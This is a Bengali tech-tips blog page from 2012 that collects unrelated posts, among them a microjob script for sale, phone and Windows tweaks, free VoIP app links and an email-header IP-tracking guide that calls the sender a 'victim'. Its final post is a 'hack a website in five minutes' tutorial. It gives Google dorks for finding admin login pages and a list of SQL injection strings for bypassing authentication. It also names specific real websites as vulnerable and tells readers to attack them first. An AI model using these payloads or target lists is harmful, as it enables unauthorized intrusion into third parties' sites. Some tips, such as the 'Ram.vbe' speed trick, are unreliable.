বৃহস্পতিবার, ৮ নভেম্বর, ২০১২

মাইক্রোওয়ার্কার্সের মত সাইটের মালিক হোন।


আমি একটি রেডিমেড মাইক্রো জব সাইট তৈরি করেছি। যা ডোমেইন+হোস্টিং+রেডি মাইক্রো জব স্ক্রিপ্ট সহ বিক্রয় করা হবে। উল্লেখ্য যে ডোমেইনটি নেমচিপে রেজিস্টার্ড।
হোস্টিং প্যানেলটি ১০০% ফ্রি হস্টেড। তবে মোটামুটি একটি মাইক্রোজব সাইট চালানোর জন্য যথেষ্ট। কেউ পেইড হোস্টিং ব্যবহার করতে চাইলে কোন অসুবিধা নেই। সেক্ষেত্রে আপনার পেইড হোস্টিং রেকর্ড নেমচিপে যুক্ত করতে হবে।
=> এই স্ক্রিপ্টের সুবিধাসমুহঃ
- এর সুবিধা নতুন করে বলার কিছু নেই, সম্পূর্ণরূপে মাইক্রোওয়ার্কার্সের মত।
- ফ্রি সাপোর্ট সবসময় (ইমেইলে)
=> ডেমো দেখুনঃ
ডেমো- http://findfree.in
এডমিন লগিন- http://findfree.in/admin/
=> মূল্যঃ
ডোমেইন এবং স্ক্রিপ্টের মূল্য $50 নির্ধারন করা হয়েছে। টি,টি ভাইদের জন্য $10 পর্যন্ত ছাড়!
বিঃদ্রঃ ডোমেইনসহ শুধু একজন ক্রেতাই ক্রয় করতে পারবেন। অন্য কেউ কিনতে চাইলে শুধু স্ক্রিপ্ট বিক্রয় করা যাবে। সাথে থাকছে ফ্রি ইন্সটলেশন সাপোর্ট।
=> যোগাযোগঃ
=> পেমেন্টঃ
আপনি ইমেইলে কন্টাক্টের পর আলোচনা সাপেক্ষে আপনাকে আমাদের পেজা(এলার্টপে),স্ক্রীল(মানিবুকার্স) অথবা বিকাশ আইডি দেয়া হবে।
=> ডেলিভারিঃ
আপনি পেইড করার পর নিম্নোক্ত জিনিসগুলো আপনার ইমেইলে সেন্ড করা হবে-
১। Namecheap.com – Domain Panel (username and password)
২। Hosting Panel – (url, login email and password)
৩। Full script copy-(in .zip format)

Mobile Charge সম্পন্ন হলে Automatic মোবাইল কথা বলে জানিয়ে দিবে


উপরের শিরোনামটি শুনে অবাক হচ্ছেন? এখানে অবাক হওয়ার কিছুই নেই । কারণ পৃথিবীতে অসম্ভব বলে কিছু নেই বললেই চলে। তাই আজকে আমি আপনাদেরকে একটা সুন্দর সফটওয়্যার-এর সাথে পরিচয় করিয়ে দেব। সফটওয়্যার একদম বিনামূলের আর মজার ব্যাপারটা হল এটিকে সাইন করার কোন ঝামলা নেই।

এটি মুলত আপনাকে আপনার ইলেকট্রিসিটির (বিদ্যুৎ) সাশ্রয় করার জন্য তৈরী করা হয়েছে। যখনি আপনার মোবাইলের চার্জ সম্পন্ন হয়ে যাবে তখনই সফটওয়্যারটি আপনা-আপনিই একটা কন্ঠস্বরের মাধ্যমে আপনাকে জাগিয়ে দেবে এবং চার্জার আনপ্লাগ করতে বলবে। কি খুব সুন্দর না? তাহলে নিচে থেকে সফটওয়্যারটি ডাউনলোড করে নিন । এই সফটওয়্যারটি নোকিয়ার ‍s60v3 ও s60v5 – এর সবগুলো মোবাইল ছাড়াও
নিম্নবর্ণিত সেটগুলোতে সাপোর্ট
করবেঃ
Nokia : 3250 XM, 5230, 5233, 5320 XM, 5500, 5530, 5700XM, 5800XM, 6110Nav, 6120c, 6120s,
6122c, 6210Nav, 6220Nav, 6650F, 6124, 6290, E50, E51, E60, E61, E61i, E62, E63, E65, E66, E70, E71, E90, N71, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N93i, N95, N96, N97, X6, X3, C6 ইত্যাদি।
Sumsung : I458, I450, I408, I400, I520, I550, I558, I560, I586, i7110, I8510, G818E, G810, L780, L788, L878E, innov8 Sony Ericsson : G702, M608c, P1c, P1i, P5i, P990, W950, W958c, W960, G900 Motorola : Z8, Z10 So. why waiting?
এখুনী ডাউনলোড করুন ।

সফটওয়্যারটি ডাউনলোড করতে এখানে ভিজিট করুন


মাউস অটো ক্লিকার (এবার আপনার মাউস ক্লিক করবে নিজে নিজে) Auto Click Soft

Please Read the Image and Download The Soft -


Click here And DOWNLOAD free

windows 7 কে windows 8 বানান সবচেয়ে সহজ উপায়ে


সবাইকে আমার শুভেছা জানাই। তাই ভুল হলে আসা করি আমাকে ছোট ভাই হিসাবে ক্ষমা করবেন।
যাই হক এবার আসল কথাই আসা যাক।

Tittle টা দেখেই হয়ত অনেকে বুঝতে পারছেন কি নিয়ে এই পোস্ট লিখা। তারপরও যারা জানেন না তাদের জন্য এই পোস্ট।


যারা উইন্ডোজ ৭ ব্যাবহার করেন তারা কিন্তু খুব সহজ উপায়ে এটাকে উইন্ডোজ ৮ এ পরিনত করতে পারেন। তবে এতে আপনার অপারেটিং সিস্টেম এর কোন পরিবর্তন হবে না। শুধু ওউটলুক হিসাবে উইন্ডোজ ৮ কাজ করবে অনেকটা themes পরিবর্তন করলে যেমন হয়।
Click Here For Download Link

এখান থেকে ফাইল টা ডাউনলোড করুন। প্রায় ৫৮এমবি হবে।
এখান থেকে Windows 8 Transformation Pack 6.0 ফাইল টা ডাউনলোড করুন


এরপর জিপ ফাইলটা উনজিপ করে নিন এবং Windows 8 Transformation Pack 6.0.exe নামের ফাইল ওপেন করুন।
এখন নিচের ছবিটি অনুসরণ করুন।


এবার পুরপুরি ইন্সটল হলে আপনার পিসি টা restart হবে। তখন দেখুন আপনার পিসিটা উইন্ডোজ ৮ এ পরিনত হয়েছে।আপনি চাইলে আপনার পিসির properities দেখতে পারেন, তখন এটা এমন দেখাবে


আরও একটা ছবি দেখেনিতে পারেন


এতক্ষন কষ্ট করে আমার সাথে থাকার জন্য ধন্যবাদ সবাইকে। কিছু ভুল করে থাকলে কমেন্টের
মাধমে জানান।

Welcome Screen এ যুক্ত করুন নিজস্ব মেসেজ



দরকারে হোক আর অদরকারে হউক আপনি ওয়েলকাম screen এর আগে হ্চ্ছমত যেকোন মেসেজ যুক্ত করতে পারেন ।নীচের পদ্ধতিটি অনুসরণ করুন আর যুক্ত করুন আপনার যেকোন মেসেজ
১। Start>Run>Regedit টাইপ করে এন্টার চাপুন।
২।এবার HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows NT > CurrentVersion > Winlogon এ ক্লিক করুন।
৩।এবার ডান দিক থেকে LegalNoticeCaption এ ডাবল ক্লিক করুন। মেসেজ এর Caption যা হবে তা টাইপ করুন।
৪। এবার ডান দিক থেকে LegalNoticeText এ ডাবল ক্লিক করুন। আপনি কি মেসেজ দিতে চান তা এর মধ্যে টাইপ করুন।
এবার কম্পিউটার রিবুট করুন আর এফেক্ট দেখুন

কম্পিউটারের গতি বাড়ানোর ছোট্ট একটি কৌশল



সবাই কেমন আছেন,আশা করি উপর আল্লাহর রহমতে ভালই আছেন।এখন আমি আপনাদের বলব কী করে কম্পিউটারের গতি বারানো যায়।

আমরা সাধারনত উইন্ডোজ চালিত কম্পিউটারের গতি বাড়ানোর জন্য বিভিন্ন ধরনের সফটওয়্যার ব্যবহার করে থাকি যা অনেক সময় গতি না বাড়িয়ে উল্টো আর গতি কমিয়ে দেয় বা বিভিন্ন ধরনের সমস্যা সৃষ্টি করে।এই সমস্যার সমাধন হল সফটওয়্যার ব্যবহার না করেই গতি বাড়ানো।
খুব সহজেই সফটওয়্যার ছাড়া কম্পিউটারের গতি বাড়ানো যায়।
এজন্য প্রয়োজন শুধুমাএ Notepad এবং অবশ্যই উইন্ডোজ চালিত কম্পিউটার।

১। প্রথমে Notepad Open করে >>>>>>>>>এতে,Mystring=(80000000) লিখে ফাইলটি Ram.vbe নামে Desktop-এ Save করুন।
০২। এবার Start-এর Run এ গিয়ে Regedit লিখে Enter চাপুন। এবার HKEY_CURRENT_USER এর Control Panel এ Doubel Click করে এর Desktop-এ Single click করুন।
০৩। এবার ডান পাশে Desktop-এর Registry গুলো দেখতে পাবেন। সেখান থেকে MenuShowDelay খুজে বের করুন।এবং Double Click করেন।
০৪। এবার এর ‍string Editor আসবে।সাধারনত এর Value দেয়া থাকে 400। একে শূন করে দিন। এবার computer Restart করে Ram.vbe এ double click করুন। এটি আপনে start Up এ রেখে দিলে computer চালুর সাথে এটি চালু হবে। আর desktop এর এটি Hide করে রেখে দিন।
https://www.facebook.com/pages/Monlancer/375973959146705

সোমবার, ৫ নভেম্বর, ২০১২

IP অ্যাড্রেস ট্র্যাকিং করে ঠিকানা বের করুন মাত্র ১ মিনিটে


আজ আমি আপনাদের সাথে শেয়ার করবো কিভাবে IP অ্যাড্রেস ট্র্যাকিং করতে হয় এবং যে কারো ঠিকানা বের করতে হয়। হ্যাকিং কথাটা আসলে ট্র্যাকিং কথাটা চলে আসে। কারন একজন হ্যাকার সবসময় ট্রাই করে হ্যাক করার জন্য। আর ভিকটিম ট্রাই করে হ্যাকার কে খুজে বের করার জন্য। আর হ্যাকার কে খুজে বের করার জন্য বিভিন্ন ভাবে ট্র্যাকিং করা হয়। তাই এখন আমি আপনাদের দেখাব কিভাবে IP ট্র্যাকিং করতে হয়। তাহলে চলুন কথা না বারিয়ে ট্র্যাকিং শুরু করা যাক।

Email থেকে বের করুন sender-এর IP 


অ্যাড্রেস…..


অনেক সময় অনেক ফাউল পোলাপান মেইল পাঠিয়ে মজা করে, বিরক্ত করে অথবা spamming করে। তাদের কে শাস্তি দেওয়ার জন্য তাদের খুজে বের করতে হবে। এখন আসুন কিভাবে তাদের IP বের করবেন। প্রথম মেইল থেকে “email header” বের করতে হবে ।


১. Google Mail (GMail)

ক. যে ব্যক্তির IP অ্যাড্রেস বের করবেন ওই ব্যক্তির  মেইলটি ওপেন করেন।
খ. মেইল টি ওপেন করার পর উপরে দেখুন replay, replay all, Show Original ইত্যাদি লেখা আছে। ওখান থেকে Show Original-এ ক্লিক করেন। তাহলে নতুন একটি ট্যাব ওপেন হবে। ওই ট্যাব থেকে সব copy করেন। তারপর এই সাইট-এ যান। বক্স-এ লেখা গুলো past করেন। then “Get Source”-এ ক্লিক করেন পেয়ে যাবেন victim-এর IP. এখন IP টি save করে রাখুন।

২.Yahoo Mail (Yahoo)

**** ইয়াহু-এর নতুন ভার্শনের ক্ষেত্রে।
ক. যে মেইল থেকে sender-এর IP বের করতে চান তার মেইলের উপর mouse-এর right click করেন। তারপর “View Full Headers”-এ ক্লিক করেন। তাহলে একটা উইন্ডো ওপেন হবে।
খ. ওখান থেকে সব copy করেন। তারপর এই সাইট-এ যান। বক্স-এ লেখা গুলো past করেন। then “Get Source”-এ ক্লিক করেন পেয়ে যাবেন victim-এর IP. এখন IP টি save করে রাখুন।
**** ইয়াহু-এর classic ভার্শনের ক্ষেত্রে।
ক. mail ওপেন করেন। তারপর View Full Header-এ ক্লিক করেন। তাহলে একটা উইন্ডো ওপেন হবে।
খ. ওখান থেকে সব copy করেন। তারপর এই সাইট-এ যান। বক্স-এ লেখা গুলো past করেন। then “Get Source”-এ ক্লিক করেন পেয়ে যাবেন victim-এর IP. এখন IP টি save করে রাখুন।

৩.Windows Live (Hotmail)

ক. ম্যাসেজ-এর উপর right click করেন তারপর “View Full Header”-এ ক্লিক করেন।তাহলে একটা উইন্ডো ওপেন হবে।
খ. ওখান থেকে সব copy করেন। তারপর এই সাইট-এ যান । বক্স-এ লেখা গুলো past করেন। then “Get Source”-এ ক্লিক করেন পেয়ে যাবেন victim-এর IP. এখন IP টি save করে রাখুন।
এখন ত victim-এর IP address পেয়ে গেলেন। এখন সালা ভিকটিম যাবে কোথায় ? আজকে খবর-ই আছে

এখন আসুন ভিকটিমের ঠিকানা বের করি

অনেক ভাবে ট্র্যাকিং করা যায়। তার মধ্যে থেকে আমি আপনাদের মাত্র কয়েক টা নিয়ম দেখাব। যেগুলো প্রাথমিক পর্যায়ে ব্যাবহার করা হয়। আপনাদের advance গুলো শিখানো যাবে না। তাইলে আবার আমাকে ট্র্যাকিং করে বের করে ফেলবেন!!! যাই হোক শুরু করা যাক ট্র্যাকিং।
১. এখন এই সাইটে যান। 
এখন IP লিখে “IP Locator”-এ ক্লিক করেন।  সব পেয়ে যাবেন। oh!!কি মজা না। পেয়ে গেলেন সব।

২. এখন এই সাইটে যান। 

এখন IP লিখে “Lookup IP Address”-এ ক্লিক করেন।

৩. এখন এই সাইটে যান। বক্সে ip address লিখে Check IP address এ ক্লিক করুন । এই সাইট টা অনেক ভালো। অনেক ইনফো পাওয়া যাবে এই সাইট থেকে ।এখন IP লিখে “IP Locator”-এ ক্লিক করেন।
 IP অ্যাড্রেস ট্র্যাকিং করে ঠিকানা বের করুন মাত্র ১ মিনিটে ।

আশা করি এখন সব বুঝে গেছেন। আমাকে আর কিছু বলতে হবে না।
(বিঃদ্রঃ সঠিক লোকেশান জানার জন্য আপনাকে প্রথম জানতে হবে worldএর ম্যাপ সম্পর্কে। আর বিশেষ করে Latitude এবং Longitude কী এবং Latitude এবং Longitude দিয়ে কিভাবে কোন নির্দিষ্ট এলাকা/যায়গা চিহ্নিত করতে ) 
সবাইকে ধন্যবাদ ।

নিজেই তৈরি করুন Animated Tex Effect


শুরুতেই আমার সালাম এবং  শুভেচ্ছা গ্রহন করুন  আশা করি সবাই ভাল আছেন 
আজ আমি আপনাদের সাথে একটি Animated Tex Effect তৈরি করার একটিসফটওয়্যার শেয়ার করব 

আমার আগে যদি কেউ এই পোস্ট তি করে থাকে তবে আমি আন্তরিক ভাবে দুঃখিত 
এই সফটওয়্যারটির মাধ্যমে  লাইনের যেকোনো লেখাকে আপনারা বিভিন্ন রকম ইফেক্টদিতে পারবেন 
এর আরও একটি সুবিধা আছে, এটি ইফেক্ট এর সাথে সাউন্ড  দিবে 
এখানে পাবেন চমৎকার কিছু ইফেক্ট যা খুব সহজে পাওয়া যায় না 
Animated Tex Effect-টিকে আপনার কম্পিউটারে SWF ফাইল হিসেবে সেভ করে রাখতেপারবেন 
আবার ইচ্ছা করলে ওয়েব সাইটে আপলোড করতে পারবেন এটির HTML এর মাধ্যমে 
সফটওয়্যারটির নাম Anim-FX 3.3  এটি ফুল ভার্সন ডাউনলোড করতে পারবেন 
১.৫৬ এমবি মাত্র 

সফটওয়্যারটি ডাউনলোড করতে এখানে ক্লিক করুন   
পাসওয়ার্ড এর জন্য এখানে ক্লিক করুন 

যেভাবে মোবাইল থেকে মোবাইলে ফ্রী কথা বলবেন


**যেভাবে মোবাইল থেকে মোবাইলে ফ্রী কথা বলবেন**

মোবাইল টু মোবাইল আন লিমিটেড কল করার কয়েকটি সেরা সফটওয়্যার দেয়া হলএগুলোর মধ্যে আপনি পছন্দ অনুযায়ী যে কোন একটি সফটওয়্যার ডাউন লোড করে আন লিমিডেট কথা বলুন
সফটওয়্যার গুলো ব্যবাহারের নিয়ম:

১) যার সাথে কথা বলবেন তার মোবাইলেও এই সফটওয়্যারটি ইন্সটল করতে হবে 
২) উভয়ের ইউজার পরস্পরে ফ্রেন্ড লিস্টে এড থাকতে হবে
৩) উভয় পক্ষে নেট থাকতে হবেতাছাড়া প্রত্যেকটির ওয়েব সাইটে সেগুলো ব্যাবহারের বিস্তারিত নিয়ম-কানুন লিখা আছে
যাদের আত্মীয় স্বজন বিদেশেথাকেনতাদের জন্য এ পদ্ধতিতে কথা বলা খুবই লাভ জনককারণ, বিদেশ থেকে কল করতে অনেক পয়সা ব্যায় করতে হয়কিন্তু এখানে উভয় পক্ষে সামান্য পয়সা খরচ করে ইন্টারনেট প্যাকেজ কিনে যত খুশি কথা বলা যায়কোনটিতে চ্যাটিং এবং কোনটিতে ছবি, ভিডিও,অডিও ইত্যাদি শেয়ার করে পরিবারের সাথে সার্বক্ষণিক যোগাযোগ রাখা সম্ভব হয়
নিচে নাম সহ ডাউনলোড লিংক দেওয়া হল



১.নিমবাজ: আন লিমিটেড কল, চ্যাট, চ্যাট রুম, ছবি, ভিডিও, অডিও ফাইল শেয়ারিংyahoo সহ gtalk,msn ইত্যাদি জনপ্রিয় মেসেঞ্জারগুলোতে কলsip call সাপোর্ট
Download link: http://www.nimbuzz.com/en

২.স্কায়পী: আন লিমিটেড কল, চ্যাট, ছবি, ভিডিও, অডিও ফাইল শেয়ারিং
Download link: http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ 
৩.টকোনাউট: আন লিমিটেড কল ও চ্যাট
Download link: http://www.talkonaut.com/
৪.বারা ব্লু: আন লিমিটেড কল ও চ্যাটমোবাইল টু পিসি ভিডিও কল সাপোর্ট
Download link: http://www.barablu.com/pages/home-1.aspx
৫.মোকল: আন লিমিটেড কল
Download link: http://www.mo-call.com/en/mobile-voip/
৬.গিজমো ফাইভ: আন লিমিটেড কল
Download link: http://www.getjar.com/mobile/14519/gizmo5/
৭.টিভি ফোন: আন লিমিটেড কল ও চ্যাট৩জি থাকলে আন লিমিটেড ভিডিও কল
Download link: http://www.tivi.com/en/tech/voipsoft.php
৮.টেল ফ্রি: আন লিমিটেড কল, চ্যাট, এস এম এস ও ইমেইল
Download link: http://mobile.telfree.com/
৯.ফ্রিং: আন লিমিটেড কল, (৩জি বা ওয়াইফাই থাকলে) ভিডিও কল, চ্যাটিং, ছবি, ভিডিও, অডিও ফাইল শেয়ারিংgtalk,msn ইত্যাদি জনপ্রিয় মেসেঞ্জারে কলইয়াহু কল এখনো সাপোর্ট করে নাsip call সাপোর্ট
Download link: http://www.fring.com/

অপেরা মিনি দিয়ে ফেইসবুকে লাইক/কমেন্ট করুন লোডিং ছাড়াই

Opera mini দিয়ে যখন facebook এর কোন জায়গায় comment/like করা হয়, তখন page টা আবারো loading হয় । আর এই কারণে অনেকেই opera mini এর বদলে UC browser ব্যাবহার করে । কিন্তু opera mini তেই এর সমাধান আছে । এখন আমি এর সমাধান দিচ্ছি…
আমি এখানে opera mini 6.5 ব্যাবহার করেছি… ১. প্রথমে address bar এ opera:config অথবা config: লিখে ok দিন
২. এর পর নিচে দেখানো page টা আসবে…
৩. একটা option দেখতে পাবেন “site patches and user agent masking” নামে । এই option টা “No” করে দিন
৪. এর পর নিচে গিয়ে “save” এ ক্লিক করুন…
৫. ব্যাস, আপনার কাজ শেষ… Try করে দেখুন আর Loading হয় কিনা…
ধন্যবাদ। 

এবার জাভা ফোনেই করুন একসাথে একাধিক কাজ!! সুপার টিপস

সিমবিয়ানের মাল্টি টাস্কিং সুবিধা দেখে অনেক জাভা ফোন ইউজারের হিংসে হয়! তাই নিয়ে এলাম জাভা ফোনেই একসাথে একাধিক এপ্লিকেশন চালানোরএকটি ট্রিকস !

 ***তবে, এটি PTT(Push toTalk Switch)এর উপর নির্ভরশীল।তাই, কেবল PTT(Push to Talk Switch) যুক্ত জাভা ডিভাইসেই এই ট্রিকস খাটানো যাবে।

সাধারনত নোকিয়া মোবাইল গুলোতে PTT(Push toTalk Switch) থাকে । 
প্রথমে, আপনার PTT সেটিংস ঠিক করে নিতে হবে।
১)নিচের নির্দেশনা অনুসরন করুনঃ Goto Menu->Push to Talk(PTT) ->Push to talk Settings->Push to talk default function->Choose Open Phonebook or Contacts
এখন যেকোন এপ্লিকেশন অপেন করুন, যেমন Opera Mini.
২) এবারে Volume Key চেপে ধরে রাখুন, PTT থেকে Contacts অপেন হবে।
৩) এবার Add New->Choose From Contacts->Choose Contact from Phonebook এ গিয়ে পছন্দের নাম্বারটি সেভ করুন।আপনি ইচ্ছা করলে সবুজ কল বাটন চেপে Opera Mini চলমান অবস্থায় কল দিতে পারবেন।

এভাবে নিম্নের অনেক কাজ যেকোন এপ্লিকেশন চলমান অবস্থায় করতে পারবেনঃ
ডিফল্ট ব্রাউজার খোলাঃ আবার Volume Key চেপে PTT অপেন করে, Option ->Add Contact->Select Add manually /Options ->Add tone ->Tone Downloads / Options->Add New Bookmark -এ গিয়ে নিজের পছন্দমত এড্রেস চেপে ব্রাউজ করতে পারবেন।
গান শোনা এবং ভিডিও দেখাঃ Options->Add Contact->Add Manually / Options->Choose Add Details ->Select Tone->Open Gallery এ গিয়ে আপনার পছন্দমত গানটি শুনুন।একই ভাবে যেকোন ভিডিও ফাইল সিলেক্ট করে, ভিডিও দেখতে পারবেন।

কল আসার পূর্বেই জেনে নিন আপনার মোবাইল এ কল আসছে!!!

প্রথমে আপনার মোবাইলের Menu অপশনে যেতে হবে তারপর Setting এ গিয়ে Connectivity তে যেতে হবে । তারপর  Packet data তে যান । Packet data connection থেকে always online সিলেক্ট করুন |
এখন আপনার মোবাইলের স্ক্রীন এর উপরে E অথবা G চিন্থ দেখতে পাবেন । এই চিহ্ন হচ্ছে এই বেপারটা বোঝার উপায়।
 কল আসার পূর্বে E অথবা G চিন্থটির পরিবর্তন হবে মানে এর উপরে ক্রস চিহ্ন আসবে ।  

এভাবে কল আসার ৫ থেকে ১০ সেকেন্ড পূর্বেই আপনি বুজতে পারবেন যে কল আসছে ।
তাহলে এখন থেকে মিস কল ধইরা বাঁশ দিন !!!!!!!!!   
সবাইকে ধন্যবাদ ।

মাত্র ৫ মিনিটে একটি ওয়েবসাইট হ্যাক করে সবাইকে দেখিয়ে দিন আপনিও হ্যাকার

আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট হ্যাক করতে  হয়। আমার মনে হয় আপনি এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে।আসুন শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব।  হ্যাকিং শুরু করুন।
  • প্রথমে আমরা যাব www.google.com এ।
  • এবার Search বক্সে নিচের যে কোন একটি Google dork/sql injection লিখুন।
  • আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"  
"inurl:login/admin.asp"  
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
 "inurl:admin_login.asp"
 "inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
  "inurl: login/admin.php"
 "inurl: admin/login.php"
 "inurl: adminlogin.php"
 "inurl: adminhome.php"
 "inurl: admin_login.php"
 "inurl: administratorlogin.php"
 "inurl: login/administrator.php"
 "inurl: administrator_login.php"
  • এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
  • যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
  • এখানে ইউজার নেম দিনঃ   Admin
  • তাহলে পাসওয়ার্ড কি দিবেন ? নিচের থেকে যে কোন একটি দিন । 
  • নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিনঃ
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
  • তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
 password:'or'1'='1
  • এবার submit এ ক্লিক করুন।
  • ব্যস কাজ শেষ আপনি এখন ঐ সাইট এর এডমিন । 
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট করে আপনাকে গুগল এ খুজতে না হয় । তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
www.sunmarytrust.org/adminlogin.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp

গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে । আমাদের টেকনোট্রিক বিডি এর সাথে থাকুন । 
কমেন্ট করতে আশা করি ভুলবেন না । 
সবাইকে ধন্যবাদ ।